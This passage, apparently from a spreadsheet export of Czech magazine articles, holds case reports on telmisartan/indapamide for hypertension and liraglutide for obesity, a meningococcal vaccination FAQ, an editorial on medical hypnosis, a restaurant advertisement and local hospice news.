agonisty dopaminu, SSRIs, inhibitory MAO, antipsychotika 1. a 2. generace, antiepileptika a další. Problémem u těchto léků je jednak polypragmazie a fakt, že pacienti často tyto léky z důvodu studu lékařům nepřiznávají. Během 10–14 dní po nasazení nové antihypertenzní medikace se ustanovuje homeostáza. Dle studie TRICOLOR je dosažení cílových hodnot u 40 % pacientů docíleno do dvou týdnů, u 75 % pacientů do 4 týdnů (7). Nemá tedy smysl pacientovi měnit léčbu dříve, než uplyne tato doba a je vhodné pacienta o tomto efektu poučit. Dále je vhodné pacienta poučit, že s výraznými změnami teplot (typicky v létě ve velkých vedrech) bude pokles tlaku výraznější a pacient by měl být edukován o event. snížení dávky léku. Obzvláště obezřetně je třeba postupovat u starších fragilních pacientů, u kterých bychom měli up-titrovat léčbu velmi pozvolna, tak abychom předešli vzniku hypotenze, hypoperfuze mozku a vertigu se synkopou. Co se týče vzniku možné hyponatrémie u užívání diuretik obecně, je vhodné pacientům nedoporučovat přísnou restrikci soli, a to zejména u starších osob, které fyziologicky solí méně. Erektilní dysfunkce je definována jako přetrvávající neschopnost dosáhnout a udržet erekci nutnou pro uspokojující sexuální styk. Její prevalence se odhaduje na 15–20 % v obecné populaci, u mužů nad 40 let je to asi 50 %. U hypertoniků je výskyt 1,3-6,9krát častější než u normotoniků (8). ED lze považovat za významný rizikový faktor KV komplikací. Hypertenze akceleruje cévní změny, které mohou vést k vaskulárně podmíněné ED. Na druhou stranu existuje hypotéza, která však nebyla nikdy potvrzena, že některé antihypertenzní léky by mohly snížit přívod krve do penilních cév, a tím také přispívat k ED. Dalším faktorem je obava z nemoci samé, zejména u nově diagnostikované hypertenze a kardiovaskulárních komplikací, které mohou vést ke vzniku ED. Neexistují žádné klinické studie, které by potvrdily či dokumentovaly vliv telmisartanu/indapamidu na riziko rozvoje tohoto onemocnění. Telmisartan samotný je obecně považován za lék s nižším rizikem vzniku ED ve srovnání s jinými antihypertenzivy (9). Kazuistika 1 84letá žena (64kg/164cm, BMI 23,8) byla odeslána praktickým lékařem do interní ambulance k úpravě léčby AH. Pacientka je dále léčena pro hypofunkci štítné žlázy, osteoporózu a dyslipidémii. Pacientka byla doposud léčena medikací: nitrendipin 20 mg ½-0-0 tbl, telmisartan 40 mg 1-0-0, rosuvastatin 10 mg, L-thyroxin 50 ug denně, vit D a preparát vápníku. V ambulanci má opakovaně měřené hodnoty okolo 138/ 93 mmHg, přichází s doma naměřenými hodnotami tlaku pažním tonometrem: 166/96, 133/94, 150/104, 145/105, 155/101, 123/91, 138/94 mmHg. Doplňujeme 24hod TK Holter monitoring se závěrem dekompenzované AH (celkový čas 155/87, den 149/85, noc 162/90, reverse dipper). Vstupní iontogram: Na 138, K 5,1, Cl 100mmol/l, CKD-EPI 1,02ml/s. V medikaci rušíme nitrendipin a telmisartan a nově volíme fixní kombinaci telmisartan/indapamid 80/2,5 mg 1-0-0. Pacientka poučena o pokračujícím domácím monitoringu TK. Za 14 dní nás pacientka kontaktuje telefonicky a oznamuje, že si preparát telmisartan/indapamid 80/2,5 mg půlí z důvodu motání hlavy a měření systolického tlaku okolo 105 mmHg. Tuto úpravu schvalujeme a navrhujeme v ní pokračovat. Po dvou měsících od vstupní kontroly přichází na pravidelnou kontrolu s průměrem domácího měření 130/78 mmHg, iontogram Na 138, K 4,4, Cl 99, CKD-EPI 1,08 ml/s, měření v ambulanci jsou již totožná s domácím měřením 134/82 mmHg. Ponecháváme fixní preparát telmisartan/indapamid 80/2,5 mg ½-0-0. U starších fragilních pacientů je výhodnější začínat s menší dávkou antihypertenziv nebo pacienty řádně poučit o možnosti úpravy dávky v domácím prostředí dle aktuálních hodnot naměřeného tlaku. Kazuistika 2 59letý muž byl odeslán praktickým lékařem do interní ambulance pro „metabolické odchylky“ a doposud se s ničím neléčil. Vstupní hodnoty v ambulanci: TK 183/110, SF 65/min, 105 kg/190 cm, BMI 29,09. V odběrech v naší ambulanci: Na 137, K 4,6, Cl 99 mmol/l, CKD-EPI 1,2 ml/s, FPG 7,5 mmol/L (lačná glykémie), HbA1C 75 mmol/mol (glykovaný hemoglobin), LDL 4,0 mmol/L, KM 473 umol/L (kys. močová). Do medikace zavádíme na tlak fixní kombinaci preparátu telmisartan/indapamid 80/2,5 mg 1-0-0, dále na diabetes mellitus metformin XR 2 g denně (s postupnou up- -titrací), rosuvastatin 20 mg denně. Za týden nás pacient mailem kontaktuje s obavami, že mu preparát na tlak způsobuje potíže s erekcí. Pacienta jsme si pozvali na kontrolu. TK stále nedosahoval cílových hodnot – aktuálně 160/85 mmHg. Pacienta ujišťujeme, že medikace nezpůsobuje erektilní potíže a přesvědčujeme ho, aby vyčkal se stávající medikací do doby kompenzace tlaku. Dále mu byla důrazně doporučena změna životního stylu a snaha o redukci hmotnosti. Po 8 týdnech od vstupní kontroly přichází pacient do ambulance s hodnotami: 90 kg (-15 kg), BMI 24,3, TK 120/70, SF 64/ min, LDL 2,3 mmol/l, FPG 5,7 mmol/l, HbA1c 41 mmol/L, KM 508 umol/L. Stávající medikaci ponecháváme bez úpravy dávkování, nicméně pro další nárůst hyperurikémie přidáváme do medikace alopurinol 300 mg 1x denně. Na kontrolu za 6 měsíců pacient přichází bez subjektivních potíží, erektilní funkce udává normalizované, přibral na váze 4 kg (94 kg) – tedy aktuální BMI 26,59, TK 120/62 mmHg, SF 60/min, LDL 2,4 mmol/L, gly 6,3 mmol/l, HbA1c 39 mmol/mol, Na 138, K 4,5, Cl 102 mol/l. Medikaci ponecháváme bez úpravy. Kombinační terapie telmisartanu s indapamidem tedy vedla k úpravě tlaku, po kompenzaci tlaku a komorbidit také zmizely erektilní potíže pacienta. Závěr Kombinační léčba arteriální hypertenze fixním preparátem telmisartanu s indapamidem je účinným nástrojem léčby arteriální hypertenze pro všechny věkové kategorie, avšak s nutnou obezřetností a opatrnou titrací dávky u starších a fragilních pacientů. Každý lékař by si měl být vědom potenciálních nežádoucích účinků léčby s ohledem na komorbidity či konkomitantní medikaci pacienta. Součástí nasazení medikace by mělo být také poučení pacienta, jak se zachovat v situacích, které mohou modifikovat léčbu (vyšší teploty – pokles TK, snížení příjmu draslíku ve stravě, zvracení či průjem apod.). Základem úspěšné léčby arteriální hypertenze je adherence pacienta k léčbě, která je jednak daná kvalitním preparátem optimálně užívaným jednou denně s nízkým výskytem nežádoucích účinků, ale dále také důvěrou pacienta k lékaři, který je schopný pacienta dobře edukovat a připravit na nestandardní situace. Literatura (1) Cífková R, Bruthans J, Wohlfahrt P, et al. Prevalence hlavních rizikových faktorů kardiovaskulárních onemocnění v české populaci v letech 2015–2018. Studie Czech post- -MONICA. Cor Vasa, 2020;62:6–15. (2) Mattioli A.V, et al. Regression of left ventricular hypertrophy and improvement of diastolic function in hypertensie patients with telmisartan. Int J Cardiol 2204; 97: 383–388). (3) TRANSCEND Investigators. Lancet2008 Sep 27;372(9644):1174–83. (4) SHEP Cooperative Research Group. Prevention of stroke by antihypertensive drug treatment in older persons with isolated systolic hypertension: final results of the Systolic Hypertension in the Elderly Program (SHEP). JAMA. 1991; 265: 3255–3264. (5) Raggi U, Palumbo P, Moro B et al. Indapamide in the treatment of hypertension in non-insulin-de- pendent diabetes. Hypertension 1985; 7(6 Pt 2): 157–160. doi: 10.1161/ 01.hyp.7.6_pt_2.ii157. (6) Madkour H, Gadallah M, Riveline B et al. Indapa- mide is superior to thiazide in the preservation of renal function in patients with renal insufficiency and systemic hypertension. Am J Cardiol 1996; 77(6): 23B–25B. doi: 10.1016/s0002-9149(97)892 36-3. (7) Logunova N, Khomitskaya Y, Karpov Y, et al. Antihypertensive effectiveness and tolerability of perindopril/indapamide/amlodipine triple single-pill combination in the treatment of patients with arterial hypertension (TRICOLOR). J Hypertens. 2021;39:e373. (8) Viigimaa M, Vlachopoulos C, Lazaridis A, Doumas M. Ma- nagement of erectile dysfunction in hypertension: Tips and tricks. World J Cardiol. 2014; 6(9): 908–915. (9) Manolis A, Doumas M. Antihypertensive treatment and sexual dysfunction. Curr Hypertens Rep. 2012; 14(4): 2xw85–92. Autor: MUDr. Markéta Ječmenová Interní a kardiologická ambulance Brno, info@intermedcare.cz Autor person Markéta Ječmenová Interní Rubrika transition_slide kardiologie</t>
  </si>
  <si>
    <t>20241201_284_3474541712_2b9d71d9e4a5d20a2b47.html</t>
  </si>
  <si>
    <t>2b9d71d9e4a5d20a2b47</t>
  </si>
  <si>
    <t>Meningokokové infekce – základní otázky a odpovědi</t>
  </si>
  <si>
    <t>Meningokokové infekce – základní otázky a odpovědi 1. Co jsou meningokokové infekce a proč jsou klinicky závažné? Meningokokové infekce, způsobené bakterií Neisseria meningitidis, patří mezi akutní, život ohrožující stavy. Charakterizuje je rychlý nástup symptomů a vysoká mortalita bez včasné diagnózy a adekvátní terapie. Spektrum projevů sahá od asymptomatického nosičství přes lokalizované infekce až po invazivní meningokokové onemocnění (IMO). 2. Jaké klinické formy invazivního meningokokového onemocnění rozlišujeme? IMO se manifestuje třemi základními formami: • Meningokoková sepse (přibližně 25 % případů), mortalita dosahuje až 25 %. • Meningokoková meningitida (rovněž 25 % případů), s mortalitou kolem 2 %. • Kombinovaná forma sepse a meningitidy (50 % případů), s mortalitou 5 %. Nejzávažnější je těžká sepse spojená s Waterhouse-Friderichsenovým syndromem, který má téměř 100% smrtnost. 3. Jaké jsou méně časté projevy meningokokových infekcí? Mezi méně časté, ale stále klinicky významné formy, patří meningokoková pneumonie, pleuritida, artritida, perikarditida a myositida. 4. Jaké kroky zahrnuje diagnostika meningokokových nákaz? Diagnostika vyžaduje odběr primárně sterilních vzorků (krev, cerebrospinální mok, exsudát z kloubní dutiny či serózních blan) a jejich odeslání do Národní referenční laboratoře (NRL). Výsledky musí být hlášeny do systému ISIN (Informační systém infekčních nemocí) v souladu s legislativními předpisy. 5. Jak dochází k přenosu meningokokové infekce a jak dlouho trvá inkubace? Bakterie se šíří prostřednictvím kapének od nosiče nebo infikovaného jedince. Inkubační doba činí obvykle 2–7 dní, výjimečně až 10 dní. 6. Jaká je prevalence nosičství meningokoka v populaci? Přibližně 10 % populace je asymptomatickými nosiči. Prevalence nosičství je věkově specifická: u dětí do 4 let nepřesahuje 1 %, zatímco u adolescentů (15–19 let) a mladých dospělých (20–25 let) může dosahovat až 35 %. Zvýšené riziko představují kolektivy, např. univerzitní kampusy, kde nosičství může přesáhnout 20 %, což dramaticky zvyšuje pravděpodobnost propuknutí onemocnění. 7. Které skupiny jsou nejvíce ohroženy meningokokovou infekcí? Rizikovými faktory jsou: • Nízký věk: děti do 1 roku (nezralost imunitního systému) a předškolní děti. Adolescenti a mladí dospělí (rizikové chování). • Životní styl: kouření, konzumace alkoholu , častý pobyt v kolektivech. • Imunitní oslabení: předchozí invazivní pneumokokové anebo meningokokové onemocnění, absence nebo porucha funkce sleziny, transplantace kmenových buněk, primární či sekundární imunodeficit, léčba eculizimabem. 8. Jakou roli hraje vakcinace v prevenci meningokokových onemocnění? Očkování je nejefektivnější metodou prevence. Poskytuje individuální ochranu, redukuje cirkulaci bakterie séroskupin meningokoka (A, C, W a Y) v populaci a minimalizuje riziko infekce u zranitelných jedinců, kteří nemohou být očkováni. 9. Které séroskupiny meningokoka jsou v ČR a Evropě nejčastější? V Evropě dominuje séroskupina B, s nárůstem případů způsobených séroskupinami W a Y. V České republice jsou nejčastější séroskupiny B a C. Tato epidemiologická data vedla ke změně očkovacích strategií – kdy v ČR monovaletní vakcína MenC byla nahrazena tetravalentní vakcínou MenACWY. 10. Jaké jsou hlavní typy vakcín proti meningokokovým nákazám a jejich klinické využití? V současnosti jsou k dispozici dvě hlavní kategorie vakcín proti meningokokům: • Konjugované vakcíny (MenACWY): Tato skupina zahrnuje například vakcínu NIMENRIX, která pomáhá chránit proti čtyřem séroskupinám meningokoka (A, C, W a Y). Vzhledem k širokému pokrytí a dlouhodobé imunitě jsou tyto vakcíny doporučovány malým dětem do 4 let, adolescentům a rizikovým skupinám. Jedinec má být očkován proti všem 5 séroskupinám. Tedy ACWY+B. Výhodou je jednoduché schéma podání a možnost přeočkování při přetrvávajícím riziku expozice. • Proteinové vakcíny (MenB): Do této skupiny patří vakcíny TRUMENBA a Bexsero, zaměřené na séroskupinu B, která je v Evropě nejčastější. Vakcína TRUMENBA využívá pokročilé technologie s cílem pomáhat chránit proti různým variantám séroskupiny B a je vhodná pro dospívající i dospělé. 11. Kdy je vhodné kombinovat různé vakcíny proti meningokokovým nákazám? Kombinace vakcín MenACWY (např. NIMENRIX) a MenB (např. TRUMENBA) je doporučena u osob s vysokým rizikem invazivního meningokokového onemocnění, zejména: • Kojenců a dětí do 4 let • Adolescentů a mladých dospělých žijících v kolektivech jako jsou koleje, sportovní týmy či internátní školy, kde se riziko nákazy výrazně zvyšuje. • Pacientů s IMO, IPO v anamnéze • Cestovatelů: Do oblastí s vysokým výskytem séroskupin A, W, C a Y, zejména subsaharské Afriky (tzv. meningitický pás). Tato kombinace zajišťuje ochranu proti nejčastějším séroskupinám meningokoka a zároveň u séroskupin A, C, W a Y snižuje riziko asymptomatického nosičství. 12. Jaké jsou nežádoucí účinky vakcinace a jaký je bezpečnostní profil těchto vakcín? Vakcíny proti meningokokovým infekcím mají obecně velmi příznivý bezpečnostní profil. Nejčastěji se vyskytují mírné a přechodné reakce v místě vpichu (zarudnutí, otok, bolest) nebo systémové příznaky, jako je únava, horečka nebo bolesti hlavy. • Konjugované vakcíny (MenACWY): Velmi dobře tolerované, nežádoucí účinky jsou mírné a samovolně odezní. • Proteinové vakcíny (MenB): Mohou vyvolat mírně vyšší incidenci systémových reakcí (např. horečka) zejména u mladších pacientů, což je však považováno za známku aktivní imunitní odpovědi. Vakcíny jsou bezpečné i pro imunokompromitované pacienty, u nichž převažuje benefit nad možnými riziky. 14. Jakou roli hraje proočkovanost populace ve snižování rizika meningokokových epidemií? Zavedení plošného očkování nebo jeho cílené aplikace u rizikových skupin, například adolescentů, prokazatelně snižuje incidenci IMO v populaci. 15. Jaké jsou indikace očkování proti meningokokovým infekcím podle českých a evropských doporučení? Očkování proti meningokokovým nákazám se doporučuje zejména těmto skupinám: • Adolescenti a mladí dospělí: Doporučené zejména pro kolektivní prostředí (internáty, univerzity, sportovní týmy) • Kojenci a malé děti • Cestovatelé: Očkování proti MenA - CWY pro osoby cestující do oblastí s vysokou prevalencí ( subsaharská Afrika , Hajj do Saúdské Arábie ). • Imunokompromitovaní pacienti: Včetně pacientů po splenektomii, s poruchami komplementu či po transplantacích. • Zdravotníci: Zejména ti, kteří pracují s invazivními meningokokovými izoláty nebo v rizikových oblastech. 16. Jaké je epidemiologické rozložení séroskupin meningokoka v České republice ? V ČR dominuje obecně séroskupina B. Může se lišit v jednotlivých letech. 17. Jaké laboratorní testy jsou klíčové pro diagnostiku invazivních meningokokových onemocnění? Diagnostika zahrnuje: • Mikrobiologické vyšetření: Kultivace z primárně sterilních materiálů (krev, mozkomíšní mok, kloubní, pleurální, perikardiální výpotek). • Molekulární metody: PCR k detekci meningokokové DNA, zejména u pacientů s antibiotickou léčbou před odběrem. • Sérologické testy: Identifikace specifických séroskupin a potvrzení diagnózy. • Testy na přítomnost endotoxinů: Pro rychlé potvrzení sepse. 18. Jaké jsou současné trendy v očkování proti meningokokovým infekcím? • Zvyšování proočkovanosti adolescentů: Zavedení školních očkovacích programů v některých zemích. • Plošné očkování proti MenACWY: Nahrazení MenC čtyřvalentní vakcínou v řadě evropských států. • Dlouhodobé studie nosičství: Zaměřené na pochopení vlivu vakcinace na cirkulaci patogenů v populaci. 19. Jaký je vliv očkování na asymptomatické nosičství meningokoků? • Konjugované vakcíny MenACWY: Významně snižují nosičství séroskupin A, C, W a Y, čímž přispívají ke kolektivní imunitě. • Proteinové vakcíny MenB: jejich hlavní účinek spočívá v přímé ochraně očkované osoby. 20. Jaký je význam očkování v prevenci epidemií meningokokových nákaz? Očkování snižuje riziko epidemických výskytů zejména v kolektivech s vysokou prevalencí nosičství (např. internátní školy, univerzity). V zemích s vysokou proočkovaností bylo dosaženo dramatického poklesu případů IMO, což ilustruje význam plošných očkovacích kampaní. 21. Jak by měli lékaři postupovat při podezření na meningokokové onemocnění a jaké kroky podniknout k jeho prevenci v praxi? Diagnostika a léčba: • Rychlost je klíčová: Při podezření na invazivní meningokokové onemocnění (IMO) je nezbytné ihned zahájit antibiotickou léčbu empiricky, ještě před laboratorním potvrzením. Doporučené antibiotikum první volby je ceftriaxon, případně penicilin. • Transport na specializované pracoviště: Pacient by měl být co nejdříve převezen do zařízení intenzivní medicíny. Prevence: • Identifikace rizikových skupin: Lékaři by měli cíleně vyhledávat pacienty s imunodeficity, kojence a malé děti, adolescenty, cestovatele a osoby v rizikových kolektivech a doporučit jim vakcinaci. • Edukace: Lékaři by měli informovat rodiče, adolescenty a rizikové pacienty o významu očkování proti meningokokovým infekcím a možnostech prevence. • Očkovací strategie: Při indikaci očkování zvážit optimální vakcinační schéma včetně kombinace Men ACWY a MenB pro komplexní ochranu. Tímto přístupem mohou lékaři významně přispět ke snížení morbidity a mortality spojené s meningokokovými infekcemi a k ochraně ohrožených skupin populace. 13. Jaká jsou doporučená vakcinační schémata pro různé populace? Vakcinační schéma pro MenACWY vakcínu Nimenrix Autor: PharmDr. Veronika Prokešová, LL.M. Ústavní farmaceut, FN Motol Autor person Veronika Prokešová</t>
  </si>
  <si>
    <t>20241201_285_3474531499_21c8c1251d1aade81d70.html</t>
  </si>
  <si>
    <t>21c8c1251d1aade81d70</t>
  </si>
  <si>
    <t>Redukce hmotnosti vytížené matky čtyř dětí</t>
  </si>
  <si>
    <t>Redukce hmotnosti vytížené matky čtyř dětí Rubrika: obezitologie Úvod 42letá paní Marie se na začátku 09/22 dostavila k registrující praktické lékařce ke konzultaci léčby obezity s hmotností 100 kg při výšce 157 cm (BMI 40,57). Obezitou trpí od 32 let věku. Od 04/22 (při hmotnosti 103 kg a BMI 41,79) se po ukončení kojení nejmladšího dítěte snažila o redukci hmotnosti pohybem – 1x týdně chodila 60 minut s oporou 2 nordic walking holí. Na další pohybovou aktivitu čas neměla, neboť má čtyři děti ve věku 2–11 let. Režim stravování byl nepravidelný, klid na jídlo měla obvykle až pozdě večer, kdy s manželem pravidelně konzumovala kromě teplé večeře i 1–2 skleničky vína . Od 04/22 do 09/22 dosáhla úbytku hmotnosti 3 kg. Motivací ke snaze zhubnout byla námahová dušnost, fyzická nevýkonnost, bolesti kolen, které ji limitovaly v běžném životě a sportovních aktivitách s dětmi. Ortoped jí v 04/22 diagnostikoval oboustrannou koxartrózu II. st., poučil ji o nutnosti redukce hmotnosti ke zpomalení další progrese artrózy. Kazuistika V dětství prodělala pouze běžná dětská onemocnění. Chronickou medikaci neužívá. Nekuřačka, alkohol pije pravidelně – denně 1–2 sklenky vína . T. č. na rodičovské dovolené, pracovala jako asistentka pedagoga. Vdaná, žije s manželem a dětmi. Praktická lékařka jí v 09/22 nabrala kompletní laboratoř, kde byla glykémie 6,1 mmol/l, ALT 1,1 ukat/l, AST 1,6 ukat/l, GMT 1,1 ukat/l, celk. chol. 6,1 mmol/l, TAG 2, 0 mmol/l, LDL – chol. 3,6 mmol/l, kyselina močová 412 umol/l. Všechny ostatní parametry včetně glykovaného hemoglobinu byly v normě. Pro již 10 let přítomnou obezitu doporučila farmokoterapii liraglutidem. Pacientka nebyla nasazení přípravku Saxenda® při první návštěvě zcela nakloněna, po delším edukačním rozhovoru si ponechala 4 týdny na rozmyšlenou. V první polovině 10/22 se dostavila k praktické lékařce rozhodnutá pro nasazení léčby, ta s ní znovu probrala mechanismus účinku, dávkování, možné nežádoucí účinky. Paní Marie v polovině 10/22 začala aplikovat přípravek Saxenda® 0,6 mg s. c. 1x denně. Tři dny po první aplikaci se objevily pocity plnosti žaludku a břicha, tendence k tužší stolici. Pocity plnosti žaludku a břicha po třech dnech spontánně odezněly. Snazšího vyprazdňování stolice docílila každodenním užíváním vlákniny. Po týdnu navýšila dávku na 1,2 mg denně, po dalším týdnu na 1,8 mg denně. Po druhém navýšení dávky se třetí den objevila nauzea, která pátý den spontánně odezněla. Pacientka na dávce 1,8 mg denně setrvala 2 týdny. V polovině 11/22 vážila 95 kg (BMI 38,54) – za měsíc tedy zredukovala 5 % hmotnosti. Pokračovala v titraci dávky liraglutidu na 2,4 mg denně, po dalších 2 týdnech na této dávce zredukovala 1 kg – celkem za 1,5 měsíce 6 % původní hmotnosti. Postupně se začala zlepšovat fyzická výkonnost. Na začátku 12/22 zvýšila dávku na 3,0 mg denně, pokračovala redukce hmotnosti, v polovině ledna 2023 (tzn. po 3 měsících léčby) vážila 90 kg (BMI 36,51) – zredukovala 10 % výchozí hmotnosti. V polovině ledna 2023 v kontrolní laboratoři glykémie 5,8 mmol/l, ALT 1,0 ukat/l, AST 1,1 ukat/l, GMT 0,7 ukat/l, celkový cholesterol 5,6 mmol/l, TAG 1,8 mmol/l, LDL – chol. 3,4, kys. močová 370 umol/l. Pacientku desetiprocentní pokles hmotnosti, zlepšení laboratorních výsledků, a hlavně zmírnění námahové dušnosti a bolestí kolen motivovaly k dalšímu užívání liraglutidu. Na konci 03/23 dosáhla hmotnosti 85 kg (BMI 34,48), tzn. poklesu hmotnosti o 15 % za 5,5 měsíce. BMI pokleslo z 40 na 34. V druhé polovině března 2023 jí praktická lékařka nabrala druhou kontrolní laboratoř, ve které glykémie 5,6 mmol/l, ALT 0,8 ukat/l, AST 0,9 ukat/l, GMT 0,7 ukat/l, celk. chol. 5,5 mmol/l, TAG 1,7 mmol/l, LDL – chol. 3,1, k. močová 340 umol/l. Závěr Na léčbě liraglutidem pacientka oceňuje především vymizení večerní chuti na velké porce jídla a na víno . Subjektivně se jí při redukci hmotnosti zlepšila fyzická výkonnost a zmírnily bolesti kolen. Z dlouhodobé perspektivy oceňuje výrazné snížení rizika vzniku diabetu mellitu 2. typu, arteriální hypertenze (chorob, kterými trpěli oba její rodiče). V součinnosti s praktickou lékařkou plánuje pokračovat v aplikaci přípravku Saxenda® v dávce 3,0 mg s. c. 1x denně s cílem další redukce hmotnosti. Reference: 1. SPC Saxenda, SÚKL , 12/2021 Tabulka 1 Zlepšení lipidogramu 09/22 01/23 03/23 Celk. cholesterol 6,1 mmol/l 5,6 mmol/l 5,5 mmol/l TAG 2,0 mmol/l 1,8 mmol/l 1,7 mmol/l LDL 3,6 mmol/l 3,4 mmol/l 3,1 mmol/l Autor: MUDr. Magdalena Fárová Ordinace praktického lékaře MONSE, spol. s r.o. Autor person Magdalena Fárová Ordinace Rubrika transition_slide obezitologie</t>
  </si>
  <si>
    <t>20241201_286_3474529343_6e63c2f780a603b06bb3.html</t>
  </si>
  <si>
    <t>6e63c2f780a603b06bb3</t>
  </si>
  <si>
    <t>Hypnóza v medicíně: Alternativní terapeutický nástroj s vědeckým podkladem?</t>
  </si>
  <si>
    <t>Hypnóza v medicíně: Alternativní terapeutický nástroj s vědeckým podkladem? Rubrika: editorial Vážení a milí čtenáři, když jsem se poprvé setkala s tématem hypnózy v medicíně, přiznávám, že jsem k němu přistupovala s určitou skepsí. Postupně jsem ale začala objevovat, jak hluboké vědecké zázemí a terapeutický potenciál tento přístup nabízí – a možná právě to, jak dokáže překročit hranice mezi psychologií, neurologií a dalšími obory, z něj činí něco mimořádného. Moderní zobrazovací metody, jako je funkční magnetická rezonance nebo elektroencefalografie, prokazují, že hypnóza ovlivňuje mozkovou aktivitu v oblastech spojených s percepcí bolesti, pozorností a emoční regulací. Dochází ke změnám v neuronálních propojeních, zejména mezi prefrontální kůrou, talamem a limbickým systémem, což vysvětluje její schopnost modulovat bolestivé a stresové podněty. A kde se uplatňuje? Klinická hypnóza se uplatňuje jako doplněk standardních léčebných postupů v těchto oblastech: • Algeziologie: Efektivní redukce akutní i chronické bolesti, například při porodních kontrakcích, onkologických onemocněních nebo po chirurgických výkonech. • Psychiatrie: Zmírnění symptomů úzkostných poruch, posttraumatické stresové poruchy (PTSD) a depresivních stavů. • Návykové poruchy: Pomoc při léčbě závislosti na nikotinu, alkoholu či jiných psychoaktivních látkách. • Psychosomatické obtíže: Řešení funkčních poruch, jako je syndrom dráždivého tračníku (IBS) nebo tenzní bolesti hlavy. • Anesteziologie: Použití hypnózy jako součásti předoperační přípravy nebo v kombinaci s farmakologickou analgezií během zákroků. Aplikace hypnózy vyžaduje vysokou míru odborné způsobilosti a respektování medicínské etiky. Je nezbytné zajistit, aby byla hypnóza prováděna pouze lékaři nebo certifikovanými odborníky, kteří disponují adekvátním vzděláním a praktickou zkušeností. V Čechách již existuje několik vzdělávacích programů zaměřených na hypnoterapii. Hypnóza představuje stále častěji využívaný nástroj v rukou lékaře, zejména v případech, kdy konvenční terapie neposkytují dostatečný terapeutický efekt. Když se zamýšlím nad budoucností hypnózy v medicíně, vnímám ji jako příležitost – příležitost přiblížit se pacientům novými způsoby tam, kde klasické postupy selhávají. S úctou a přáním inspirativního čtení Autor: Vaše Ika Kovačič Autor person Ika Kovačič Rubrika transition_slide editorial</t>
  </si>
  <si>
    <t>20241201_287_3474929612_c198097adb578e2de192.html</t>
  </si>
  <si>
    <t>c198097adb578e2de192</t>
  </si>
  <si>
    <t>MATYLDA: NOVÝ VZHLED, NEZAPOMENUTELNÉ ZÁŽITKY</t>
  </si>
  <si>
    <t>MATYLDA: NOVÝ VZHLED, NEZAPOMENUTELNÉ ZÁŽITKY Pizzeria-Restaurace Matylda v Lysé nad Labem , známá svou vynikající pizzou a čerstvými těstovinami, nedávno prošla rekonstrukcí, která přinesla svěží, moderní vzhled, který se snoubí s tradičním stylem budovy, a ještě příjemnější atmosféru pro všechny návštěvníky. Tento oblíbený podnik je nyní ideálním místem pro všechny, kteří si chtějí vychutnat kvalitní pizzu, těstoviny, masa nebo si dopřát speciální týdenní nabídku, která je k dispozici i formou rozvozu přímo k vašim dveřím. V Matyldě se však nejen dobře jí, ale také skvěle slaví. Každý den si můžete vybrat z bohaté nabídky poledního menu, které je ideální volbou pro ty, kteří hledají rychlý a chutný oběd. V týdenních specialitách se můžete těšit na nová a originální jídla, která vás určitě překvapí. Pizzeria Matylda klade důraz na čerstvost surovin a kvalitní přípravu. Matylda není jen restaurace, ale také zkušený partner pro vaše oslavy, svatby, plesy, firemní akce nebo vánoční večírky. Restaurace nabízí kompletní cateringové služby, které zahrnují nejen výborné jídlo, ale i profesionální přístup k organizaci a přípravám na jakoukoli akci. V lednu a únoru 2025 bude Matylda zajišťovat catering například dobrovolným hasičům a městu Lysá nad Labem na jejich plesech. Jednou z největších a nejpopulárnějších událostí, kterou Matylda pořádá, je Pivobraní. Tento každoroční svátek piva , skvělé atmosféry a zábavy se koná na konci srpna a v roce 2025 se můžete těšit na 14. ročník! Od 27. do 31. srpna se na vás opět těší bohatý program s více jak 20 druhy piv , živou hudbou a spoustou zábavy pro celou rodinu. Pivobraní se stalo nejen místní tradicí, ale i oblíbeným setkáním lidí z širokého okolí, kteří sem každoročně míří za dobrou náladou a kvalitním pivem . Přijďte se podívat do Matyldy! Pizzeria-Restaurace Matylda je místem, kde se snoubí skvělé jídlo, příjemná atmosféra a možnost užít si nezapomenutelné chvíle s přáteli, rodinou nebo kolegy. Ať už si pochutnáte na pizze, těstovinách nebo se rozhodnete pro catering na vaši oslavu, vždy se můžete spolehnout na prvotřídní služby. Pokud ještě nemáte zkušenost s Pizzerií Matylda, neváhejte a přijďte se přesvědčit na vlastní oči – nové prostředí a vylepšený koncept vás zaručeně nadchnou! Pizzeria-Restaurace Matylda Masarykova 582, Lysá nad Labem , Rezervace a rozvoz jídel: 775 701 555 www.pizzeria-matylda.cz Přijďte si užít skvělé jídlo, příjemnou atmosféru a nezapomeňte si označit v kalendáři Pivobraní 2025!</t>
  </si>
  <si>
    <t>20241201_288_3474818184_7a77ec88514d395c008d.html</t>
  </si>
  <si>
    <t>7a77ec88514d395c008d</t>
  </si>
  <si>
    <t>NAPSALI NÁM</t>
  </si>
  <si>
    <t>NAPSALI NÁM KDYŽ HVĚZDY POMÁHAJÍ O ADVENTU I TANČÍ V MILOVICÍCH Po celorepublikové kampani Dožít doma, která upozorňovala na důležitost včasného kontaktování domácího hospice pro kvalitu posledních dní života, pokračujeme v naší kampani Staňte se hvězdou Velkého vozu. Díky dárcům přes internetovou platformu Darujme.cz, díky daru od Ligy proti rakovině a podzimním akcím, na kterých nám lidé přispívají, máme již více než polovinu potřebných prostředků na nové větší auto pro převoz pomůcek k našim klientům. „Vnímáme to jako zázrak, že se daří naplňovat naše odvážné cíle,“ prozradila Jana Popovičová, fundraiserka hospice. „Je za tím hodně práce našich sestřiček a sociálních pracovnic, díky kterým už mnoho lidí ví, že umíme být opravdu nablízku tam, kde nás potřebují.“ Před námi je Adventní zastavení. Týden od 9. do 13. prosince vždy od 10 do 18 hodin bude patřit v kanceláři Domácího hospice Nablízku na adrese Husovo náměstí 550/5 setkáním, předvánoční atmosféře, nákupu dárků, vůni cukroví a svařeného vína . Pokud si v našem charitativním obchůdku něco vyberete, přispějete svým nákupem opět na koupi již zmíněného auta. Od začátku prosince běží prodej lístků na 2. Charitativní ples pro hospic, který je nachystán na 7. února 2025 od 20 hodin v Kulturním domě Milovice. Tentokrát je možné lístky kupovat přímo v kanceláři hospice vždy od úterý do čtvrtka od 9 do 15 hodin. Pokud vám to nevyhovuje, můžete se na telefonu 724 435 387 (Markéta Literová) domluvit na předání lístků jindy a jinde. Ples pro nás již druhým rokem spoluorganizují naši pozůstalí, což nás moc těší, zavazuje, povzbuzuje. Prostě nás uvádí v úžas, jakou rodinu podporovatelů máme. Jste naše HVĚZDY! Děkujeme! Markéta Literová VÝSTAVA HUB Vážení milovníci houbaření a spoluobčané města Lysá nad Labem , chtěl bych vás jako předseda Spolku houbařů informovat, jak se nám opět povedlo uspořádat Výstavu hub, která se konala v sobotu 